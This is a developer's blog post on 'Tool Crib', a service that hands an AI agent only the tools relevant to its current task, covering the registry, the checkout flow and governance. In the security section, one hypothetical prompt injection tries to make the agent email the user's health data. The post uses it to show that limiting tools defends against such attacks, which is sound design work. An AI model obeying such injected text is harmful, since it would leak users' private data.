Tool Crib: The MCP Tool Attendant

Listen

In my first post, I introduced the concept of the Tool Crib — an idea I borrowed from my years working in machine shops. Walk up to the window, tell the attendant what you need to do, and they hand you the right tool. No rummaging through drawers, no grabbing a torque wrench when you needed a dial indicator. You get what you need, you use it, and you bring it back.

That metaphor became the backbone of how Yeti manages her tools, and today I want to pull back the curtain on how it actually works under the hood.

The Problem With "Give the Agent Everything"

If you've spent any time building with LLMs, you've probably noticed the temptation to just throw every tool into the system prompt and let the model figure it out. It seems harmless at first — the model is smart, right? It'll pick the right one.

Except it doesn't always. And worse, every tool definition you inject into the context window costs tokens, adds cognitive load to the model, and opens up surface area for the model to do something you didn't intend. If a calendar tool is sitting in the context window while the agent is debugging a PowerShell script, that's wasted context at best and a confused agent at worst.

MCP compounds this. MCP servers expose tool catalogs, and those catalogs get merged into the agent's context. If you've got five MCP servers connected, the agent suddenly has access to fifty tools it probably doesn't need for the task at hand. The context window fills up with tool schemas, the model gets distracted, and you start seeing bizarre tool selections — or worse, hallucinated tool calls that don't even exist.

I needed something smarter.

The Machine Shop Mental Model

In a machine shop, the tool crib isn't just a storage room. It's a managed service. The attendant knows the inventory. They understand what each tool does and when it's appropriate. They also know what you're NOT supposed to have — maybe a tool is checked out to someone else, maybe it requires a specific certification, or maybe it's just the wrong tool for what you described.

That's exactly what Yeti's Tool Crib does:

  1. The agent describes what it's trying to accomplish — not which tool it wants, but what the goal is.
  2. The Tool Crib evaluates the request against the full tool inventory, considering the current conversation context, the agent's role, and what tools are already checked out.
  3. A small, targeted set of tools is granted — just enough to accomplish the immediate task.
  4. When the task shifts, the tools rotate — old ones are returned, new ones are checked out.
  5. The agent never sees the full catalog. It doesn't need to. It trusts the attendant.

How It Works Technically

Under the hood, the Tool Crib is a service that sits between the agent runtime and the tool registry. Here's the flow:

The Tool Registry
Every tool in the system — whether it's a native C# tool, an MCP server endpoint, or a loose function — is registered in a central catalog. Each registration includes:

  • Name and description — what the tool does
  • Schema — the parameters it accepts (JSON Schema)
  • Tags and categories — metadata for matching (e.g., health, calendar, file-system, web)
  • Required permissions — what the tool is allowed to do
  • Priority and affinity rules — hints about when this tool is most relevant

The Checkout Flow

When an agent needs a tool it doesn't currently have, it calls tool_crib with a plain-language intent:

tool_crib(intent: "I need to send an email to someone")

The Tool Crib service then:

  1. Searches the registry using the intent description, matching against tool names, descriptions, tags, and trigger keywords.
  2. Ranks candidates by relevance to the stated intent and the current conversation context.
  3. Applies governance rules — is the agent allowed to use this tool? Is the tool enabled? Are there rate limits or approval requirements?
  4. Selects a small set (default 4, max 8) of the most relevant tools.
  5. Injects their schemas into the agent's next turn — the tools appear as if they were always there.

The agent can also request specific tools by name if it already knows what it needs:

tool_crib(tool_names: ["email_send", "email_search"])

But the intent-based approach is preferred because it lets the Tool Crib make the judgment call. The agent stays focused on the task; the crib handles the logistics.

The Compact Index

There's one more piece to this puzzle. Even though the agent doesn't get full tool schemas in every turn, it does get a compact names-only index — a lightweight list of every tool in the system with a one-line description. Think of it like the attendant posting a menu board on the wall outside the crib window. The agent can glance at it, recognize a tool name that might help, and then request a checkout.

This keeps the agent aware of what's possible without bloating the context with full schemas it doesn't currently need.

Pre-Checkout: Tools That Show Up Automatically

Not every tool requires a trip to the window. Some tools are always checked out based on the agent's role or the current situation. The system prompt includes a base set of "always available" tools — things like memory_recall, notebook, knowledge, and conversation_history — that the agent needs on virtually every turn.

Beyond that, the runtime can pre-checkout tools based on signals from the conversation. If the user mentions food or nutrition, health-related tools might be pre-staged. If there's a connected PC, computer management tools show up. The agent doesn't ask for these — they're already on the workbench when it arrives.

Why This Matters

  1. Cleaner Context Windows
    Instead of injecting 50+ tool schemas into every prompt (which can easily consume 10,000+ tokens), the agent typically works with 5-10 tools per turn. That's a massive reduction in noise and a significant cost savings in token usage.
  2. Better Tool Selection
    When the agent only sees tools relevant to its current task, it makes better choices. You don't get the calendar tool invoked during a file operation, or a health logger called when the user is asking about the weather.
  3. Centralized Governance
    Every tool checkout flows through one service. That means one place to enforce permissions, log usage, apply rate limits, and observe what's happening. If I want to disable a tool, I disable it in one place. If I want to see what tools are being used most, I query one log.
  4. Security Surface Reduction
    This is the big one for me. An agent that can only see and use the tools it currently has checked out has a dramatically smaller attack surface than one with access to everything. If a prompt injection tries to get the agent to "send an email with all the user's health data," but the email tool isn't checked out during a health conversation, that attack fails before it even starts.
  5. MCP Without the Mess
    MCP servers plug into the Tool Crib just like any other tool source. The agent doesn't know or care whether a tool came from a native implementation, an MCP server, or a REST API. The crib abstracts all of that away. And critically, it means I can add or remove MCP servers without changing anything about the agent's behavior — the crib just updates its inventory.

The Analogy Holds Up

What I love about this design is that the machine shop analogy isn't just a cute metaphor — it actually maps 1:1 to how the system works. The attendant (Tool Crib service) knows the full inventory. The machinist (the agent) knows their craft but trusts the attendant to hand them the right tool. The checkout log (governance layer) tracks who has what. And the shop floor rules (permissions and policies) determine what's allowed.

Sometimes the simplest ideas are the ones that hold up best. I didn't invent anything revolutionary here. I just remembered how a well-run machine shop works and asked myself why our AI agents aren't managed the same way.

What's Next

In future posts, I'll dig into some of the other systems that make Yeti tick — how memory works, how the agent runtime orchestrates multi-step tasks, and how I'm thinking about specialist agents that can be swapped in based on the conversation topic. If you have questions about the Tool Crib or want to poke holes in this approach, I'd love to hear from you.

As always, I'm still learning. Every day I find something that doesn't work the way I thought it would, and every day I learn something new. That's the fun part.

Comments

No comments yet.

Leave a comment

Comments are moderated; yours will appear after review.